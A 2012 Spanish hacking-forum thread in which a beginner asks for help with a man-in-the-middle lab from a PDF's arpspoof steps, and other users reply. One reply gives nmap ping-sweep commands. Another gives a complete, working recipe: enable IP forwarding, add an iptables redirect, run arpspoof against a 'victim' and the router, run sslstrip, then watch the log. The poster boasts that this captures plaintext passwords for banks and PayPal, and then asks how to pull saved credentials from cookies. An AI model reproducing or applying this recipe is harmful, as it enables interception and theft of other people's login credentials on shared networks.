elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  ayuda con man in the middle
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con man in the middle  (Leído 3,164 veces)
mitroll025

Desconectado Desconectado

Mensajes: 20



Ver Perfil
ayuda con man in the middle
« en: 13 Febrero 2012, 22:30 pm »

buenas buenas! tengo un pequeño problema jeje a
ver si me pueden ayudar en algo--
primero voy a decirles como es que estoy tratando
de probar esto del Man in the middle, tengo 2 pc`s
con xp, ambas conectadas a un router y en una de
ellas tengo una maquina virtual con ubuntu.ok? bien ahora siguiendo los pasos de el pdf (MITM) que publicaron en este foro
hay una explicacion de 4 pasos:
1-sudo nano /proc/sys/net/ipv4/ip_forward
Cambiamos el 0 por 1
2-sudo wireshark –i [interface]
3-sudo arpspoof -i [interface] -t [ip_objetivo] [ip_router]
4-sudo arpspoof –i [interface] –t [ip_router]
[ip_objetivo]
en el paso 1 esta todo bien cambio los valores y
listo
ahora en el paso 2 mi duda esta en donde introduzco el comando sudo wireshark –i
[interface]  perdón por mi ignorancia pero en el
lugar de interface debo poner por ejemplo "etho" o
"lo" ??esa es mi primera duda en tal caso yo puse
"lo"
ahora en el paso 3 y 4 ingreso los comandos (ahi capaz arrastro el error del paso anterior donde dice
interface puse "lo") y me da este error.
"arpspoof : couldn`t arp for host 192.168.x.x "
si pudieran sacarme de este aprieto se los
agradeceria..
p/d: otra cosa en una parte del pdf dice "Para ver las direcciones IP que están conectadas a nuestra
red, podemos entrar a nuestro router desde el
navegador"
yo entre en el mio es un d-link y no hay un panel
de control ni una opcion para ver las pc conectadas
entre al router desde el navegador y solo me da opciones para cambiar algunas configuraciones
como por ejem la contraseña del wifi.
Un millon de gracias..
En línea

MauroMasciar


Desconectado Desconectado

Mensajes: 567



Ver Perfil
Re: ayuda con man in the middle
« Respuesta #1 en: 13 Febrero 2012, 22:39 pm »

Citar
ahora en el paso 2 mi duda esta en donde introduzco el comando sudo wireshark –i
[interface]  perdón por mi ignorancia pero en el
lugar de interface debo poner por ejemplo "etho" o
"lo" ??

Te falta un poco de teoria de Linux y las redes...
Puede ser eth0 eth1 wlan0 etc...
El comando lo metes en la terminal, obviamente...

Citar
ahora en el paso 3 y 4 ingreso los comandos (ahi capaz arrastro el error del paso anterior donde dice
interface puse "lo") y me da este error.
No, no es asi, como dije, necesitas leer un poco mas, aprende que es lo, eth0, wlan0, etc...

Citar
p/d: otra cosa en una parte del pdf dice "Para ver las direcciones IP que están conectadas a nuestra
red, podemos entrar a nuestro router desde el
navegador"

Podes usar NMAP:

nmap -sP 192.168.1.1-255
nmap -sP -PI 192.168.1.1-255
En línea

Tutto ha oceani da attraversare mentre hanno il coraggio di farlo Avventato? Ma sanno sogni di limiti

Twitter: @MauroMasciar
mitroll025

Desconectado Desconectado

Mensajes: 20



Ver Perfil
Re: ayuda con man in the middle
« Respuesta #2 en: 13 Febrero 2012, 23:11 pm »

muchas gracias por la respuesta!!!y si es verdad estoy bastante verde todavia...tendre que leer mas..gracias por la ayuda..
En línea

ps3ps3ps3

Desconectado Desconectado

Mensajes: 116


Ver Perfil
Re: ayuda con man in the middle
« Respuesta #3 en: 13 Febrero 2012, 23:49 pm »

Te explico como lo hago yo en Ubuntu 11.10 facil facil,Instalo aircrack,dsniff y sslstrip 0.9 (asi ves contraseñas sin cifrar y cifradas,http y https,bancos online,paypal,etc...)

Cuando lo tengas instalado,pones la terminal y añades : echo 1 > /proc/sys/net/ipv4/ip_forward

Luego añades: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Luego: arpspoof -i eth0/wlan0 -t IPVICTIMA IPROUTER y empezara el "ataque"

Ahora abres otra terminal sin cerrar la de antes y pones: sslstrip -w  nombredetuarchivo

Aqui empezara sslstrip 0.9 (sslstrip da el cambiazo a la victima que pide una pagina https,le da el cambiazo por la misma en http y ves la contraseña sin cifrar)

Luego para ver el ataque en "vivo" abre otra terminal,sin cerrar la de antes,y pones:

tail -f nombredetuarchivo y cuando al cvictima se meta en alguna pagina te saldra,tambien puedes poner en vez de tail -f,el wireshark,aunque para mi es un poco lioso.

Asi lo hago yo y me va de lujo,prueba contigo mismo y veras como te sale.

Aprovecho para hacer una pregunta,sabreis como hacer para pillar una pass y user que esta alojada en las cookies? una contraseña recordada vamos,osea hacer un mitm a mi mismo y verme mi pass en una pagina de logueo automatico,Gracias y saludos.
En línea

MauroMasciar


Desconectado Desconectado

Mensajes: 567



Ver Perfil
Re: ayuda con man in the middle
« Respuesta #4 en: 14 Febrero 2012, 00:25 am »

el wireshark,aunque para mi es un poco lioso.

Aprovecho para hacer una pregunta,sabreis como hacer para pillar una pass y user que esta alojada en las cookies? una contraseña recordada vamos,osea hacer un mitm a mi mismo y verme mi pass en una pagina de logueo automatico,Gracias y saludos.

Una vez que entendes el wireshark no es tan lioso...
Y diria que hagas un nuevo post y no desvirtues el tema de nuestro amigo  :silbar:
En línea

Tutto ha oceani da attraversare mentre hanno il coraggio di farlo Avventato? Ma sanno sogni di limiti

Twitter: @MauroMasciar
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda con Man in the Middle (MiTM)
Hacking
W0LFeR 6 4,767 Último mensaje 9 Junio 2012, 18:34 pm
por int_0x40
Ayuda con Man in the Middle (MiTM)
Hacking
W0LFeR 3 3,267 Último mensaje 23 Agosto 2012, 16:17 pm
por darg94
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines